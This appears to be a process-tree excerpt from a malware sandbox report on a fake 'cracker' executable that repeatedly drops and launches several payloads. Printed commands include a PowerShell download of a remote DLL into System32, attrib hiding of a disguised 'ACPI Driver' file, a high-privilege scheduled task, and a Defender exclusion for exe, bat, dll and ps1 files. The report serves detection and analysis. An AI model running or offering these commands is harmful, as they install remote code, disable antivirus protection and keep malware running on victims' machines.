C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"4⤵
- Executes dropped EXE
PID:4020
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"4⤵
- Executes dropped EXE
PID:1416
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"5⤵
- Executes dropped EXE
PID:2424
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"5⤵
- Executes dropped EXE
PID:3952
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"5⤵
- Executes dropped EXE
PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"5⤵
- Executes dropped EXE
PID:4668
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:932 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc\$77Microsoft ACPI Driverc.exe"7⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4316
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc"7⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5744
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc\$77Microsoft ACPI Driverc.exe"7⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFCEE.tmp.bat""7⤵PID:5516
-
C:\Windows\system32\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:5080
-
-
C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc\$77Microsoft ACPI Driverc.exe"C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc\$77Microsoft ACPI Driverc.exe"8⤵PID:5984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"6⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:852 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"7⤵PID:5996
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"8⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"6⤵
- Executes dropped EXE
PID:452
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"6⤵
- Executes dropped EXE
PID:1044
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4748 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"7⤵
- Executes dropped EXE
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"7⤵
- Executes dropped EXE
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"7⤵
- Executes dropped EXE
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"7⤵
- Executes dropped EXE
PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"8⤵
- Executes dropped EXE
PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"8⤵
- Executes dropped EXE
PID:3700
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"8⤵
- Executes dropped EXE
PID:4336
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"8⤵
- Executes dropped EXE
PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"8⤵
- Executes dropped EXE
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"9⤵
- Executes dropped EXE
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"9⤵
- Executes dropped EXE
PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"9⤵
- Executes dropped EXE
PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"9⤵
- Executes dropped EXE
PID:2848 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"10⤵
- Executes dropped EXE
PID:4920
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2540
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"10⤵
- Executes dropped EXE
PID:3424
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"10⤵
- Executes dropped EXE
PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"10⤵
- Executes dropped EXE
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"11⤵
- Executes dropped EXE
PID:1480
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"11⤵
- Executes dropped EXE
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"11⤵
- Executes dropped EXE
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"11⤵
- Executes dropped EXE
PID:748
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"12⤵
- Executes dropped EXE
PID:956
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3156
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"12⤵
- Executes dropped EXE
PID:3084
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"12⤵
- Executes dropped EXE
PID:1176
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"13⤵
- Executes dropped EXE
PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"13⤵
- Executes dropped EXE
PID:984
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"13⤵
- Executes dropped EXE
PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"13⤵
- Executes dropped EXE
PID:376
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"13⤵
- Executes dropped EXE
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"14⤵
- Executes dropped EXE
PID:1872
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"14⤵
- Executes dropped EXE
PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"14⤵
- Executes dropped EXE
PID:2516
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"14⤵
- Executes dropped EXE
PID:4984
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"14⤵
- Executes dropped EXE
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"15⤵PID:2156
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"15⤵PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"15⤵PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"15⤵PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"15⤵PID:3012
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"16⤵PID:5228
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"16⤵PID:5252
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"16⤵PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"16⤵PID:5324
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"16⤵
- Checks computer location settings
PID:5352 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"17⤵PID:5420
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"17⤵PID:5436
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"17⤵PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"17⤵PID:5492
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"17⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"18⤵PID:5612
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"18⤵PID:5620
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"18⤵PID:5664
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"18⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"18⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5708 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"19⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:6004 -
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft ACPI Driverc\$77Microsoft ACPI Driverc.exe"20⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1336 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV121⤵PID:5468
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN syss.exe20⤵PID:4372
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "syss.exe" /TR "C:\Users\Admin\AppData\Local\Temp\syss.exe \"\syss.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST20⤵
- Scheduled Task/Job: Scheduled Task
PID:5276
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN syss.exe20⤵PID:5824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit20⤵
- Command and Scripting Interpreter: PowerShell
PID:5184
-
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"19⤵PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"19⤵PID:6068
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"19⤵PID:6140
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"19⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"20⤵PID:3556
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"20⤵PID:5832
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"20⤵PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"20⤵PID:3256
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"20⤵
- Checks computer location settings
PID:208 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"21⤵PID:1016
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"21⤵PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"21⤵PID:5928
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"21⤵PID:5184
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"21⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4748 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"22⤵PID:5212
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"22⤵PID:4336
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"22⤵PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"22⤵PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"22⤵
- Checks computer location settings
PID:5336 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"23⤵PID:3652
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"23⤵
- System Location Discovery: System Language Discovery
PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"23⤵PID:1300
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"23⤵PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"23⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4756 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"24⤵PID:4040
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"24⤵
- System Location Discovery: System Language Discovery
PID:5632
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"24⤵PID:5596
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"24⤵PID:4928
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"24⤵
- Checks computer location settings
PID:492 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"25⤵PID:1348
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"25⤵PID:4440
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"25⤵PID:3608
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"25⤵PID:5304
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"25⤵
- Checks computer location settings
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"26⤵PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"26⤵
- System Location Discovery: System Language Discovery
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"26⤵PID:100
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"26⤵PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"26⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5736 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"27⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"27⤵PID:3224
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"27⤵PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"27⤵PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"27⤵
- Checks computer location settings
PID:208 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"28⤵PID:3700
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"28⤵PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"28⤵PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"28⤵PID:2516
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"28⤵
- Checks computer location settings
PID:5628 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"29⤵PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"29⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"29⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"29⤵PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"29⤵
- Checks computer location settings
PID:2896 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"30⤵PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"30⤵
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"30⤵PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"30⤵PID:5876
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"30⤵
- System Location Discovery: System Language Discovery
PID:6012 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"31⤵PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"31⤵
- System Location Discovery: System Language Discovery
PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"31⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"31⤵PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"31⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"32⤵PID:4680
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"32⤵PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"32⤵PID:5740
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"32⤵PID:5800
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"32⤵PID:2552
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"33⤵PID:5096
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"33⤵
- System Location Discovery: System Language Discovery
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"33⤵PID:6072
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"33⤵PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"33⤵
- Checks computer location settings
PID:652 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"34⤵PID:4036
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"34⤵
- System Location Discovery: System Language Discovery
PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"34⤵PID:5320
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"34⤵PID:5384
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"34⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:548 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"35⤵PID:5152
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"35⤵PID:4740
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"35⤵PID:1560
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"35⤵PID:6056
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"35⤵
- Checks computer location settings
PID:5492 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"36⤵PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"36⤵PID:5288
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"36⤵PID:5236
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"36⤵PID:492
-
-
